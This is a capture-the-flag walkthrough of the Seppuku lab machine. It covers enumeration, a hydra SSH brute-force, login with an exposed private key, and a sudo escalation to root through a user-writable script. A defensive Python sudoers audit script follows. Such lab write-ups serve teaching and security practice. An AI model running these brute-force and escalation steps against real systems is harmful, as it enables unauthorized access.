PGP walkthrough: Seppuku


Port Scan

21    vsftpd 3.0.3
22    OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80    nginx 1.14.2
139
445   netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080  LiteSpeed httpd
7601  Apache httpd 2.4.38
8088  LiteSpeed httpd

445&139 smb

Anonymous login is not allowed.

7080 https

---->7601

7601: web

/secret passwd.list password.bak shadow.bak : a1b2c3 (r@bbit-hole)

/production siimple 2.0.2


/ckeditor CKEditor 4.14


/keys : contains an RSA private key (id_rsa)


/stg empty

80 web

info.php: phpinfo()

8088 web

index.php: web console with a login form

/cgi-bin empty

/docs OpenLiteSpeed 1.6

/blocked empty

21 ftp

Anonymous login failed.

Attack Vector

Evidence                     Way
password.list                SSH enumeration
id_rsa                       log in by SSH
webapp: siimple, ckeditor    search for vulnerabilities

Shell as seppuku

As is often said, the title of the machine is always a clue. So I used seppuku as the username and password.lst as the wordlist to brute-force the SSH account with hydra.

hydra -l seppuku -P password.lst 192.168.87.90 ssh
[22][ssh] host: seppuku.box   login: seppuku   password: eeyoree

Hydra returned the password: eeyoree

Now I can log in as seppuku.

This account is allowed to run ln to link /root into /tmp.

Shell as samurai

While looking around seppuku's home directory, I found a hidden file, .passwd. It contained a password.

So I used this password to log in as samurai.

This account can execute a file called bin with sudo, but that file lives in tanto's home directory.

So I had to log in as tanto.

Shell as tanto

There was still the id_rsa file that had not been used yet, so I tried to use it to log in.

# paste the private key from /keys into a local file named id_rsa (e.g. with vim)
# remember to keep the trailing newline at the end of the key
chmod 400 id_rsa
ssh -i id_rsa tanto@192.168.87.90

Privilege escalation to root

Now we have everything we need to get a root shell.

The steps are:

  1. create a script "bin" that opens bash, placed in /home/tanto/.cgi_bin
  2. execute the script with sudo

As tanto:

 mkdir /home/tanto/.cgi_bin/
 echo "/bin/bash" > /home/tanto/.cgi_bin/bin
 chmod +x /home/tanto/.cgi_bin/bin   # the script must be executable for sudo to run it

Then, as samurai:

sudo /home/tanto/.cgi_bin/bin /tmp/*
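The root cause of this escalation is a sudoers rule that points at a file in another user's home directory, so whoever controls that file runs commands as root. As an added example (not part of the original writeup), here is a small audit script that flags such rules, and also flags traversal in the command path, wildcard arguments, and file-manipulating helpers like ln (the seppuku rule); the sudoers excerpt is constructed for the demo and is not the machine's real file:

```python
import posixpath
import re

# Constructed sudoers excerpt for this demo (not the machine's real file);
# the samurai rule mirrors the misconfiguration abused in the writeup.
SAMPLE_SUDOERS = """\
Defaults        env_reset
samurai ALL=(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
seppuku ALL=(ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/
tanto   ALL=(ALL) /usr/bin/apt-get update   # safe rule, must not be flagged
"""

RULE_RE = re.compile(r"^(\S+)\s+[^=\s]+=(?:\(([^)]*)\))?\s*(.*)$")
USER_WRITABLE = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")
FILE_MANIPULATORS = {"ln", "cp", "mv", "chmod", "chown"}

def parse_rules(text):
    """Yield (user, command_spec) pairs, with tags such as NOPASSWD: stripped."""
    for raw in text.splitlines():
        m = RULE_RE.match(raw.split("#", 1)[0].strip())
        if not m or m.group(1) == "Defaults":
            continue
        user, _runas, cmds = m.groups()
        for cmd in cmds.split(","):
            yield user, re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd.strip())

def audit_command(spec):
    """Return why a command spec lets its grantee reach root; [] if it looks safe."""
    binary, *args = spec.split()
    resolved = posixpath.normpath(binary)  # collapses /../../ traversal
    reasons = []
    if resolved != binary:
        reasons.append(f"path traversal: {binary} resolves to {resolved}")
    if resolved.startswith(USER_WRITABLE):
        reasons.append(f"{resolved} sits where an unprivileged user can replace it")
    if any(c in arg for arg in args for c in "*?["):
        reasons.append("wildcard argument lets the caller choose extra operands")
    if posixpath.basename(resolved) in FILE_MANIPULATORS:
        reasons.append(f"{resolved} can expose or overwrite root-owned files")
    return reasons

def audit_sudoers(text):
    """Map each user to a list of (command_spec, reasons) findings."""
    findings = {}
    for user, spec in parse_rules(text):
        if reasons := audit_command(spec):
            findings.setdefault(user, []).append((spec, reasons))
    return findings

for user, items in audit_sudoers(SAMPLE_SUDOERS).items():
    for spec, reasons in items:
        print(f"{user}: {spec}\n    " + "\n    ".join(reasons))
```

Run it against `cat /etc/sudoers /etc/sudoers.d/*` output on a real host to find rules whose command path an unprivileged user can write to or redirect.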
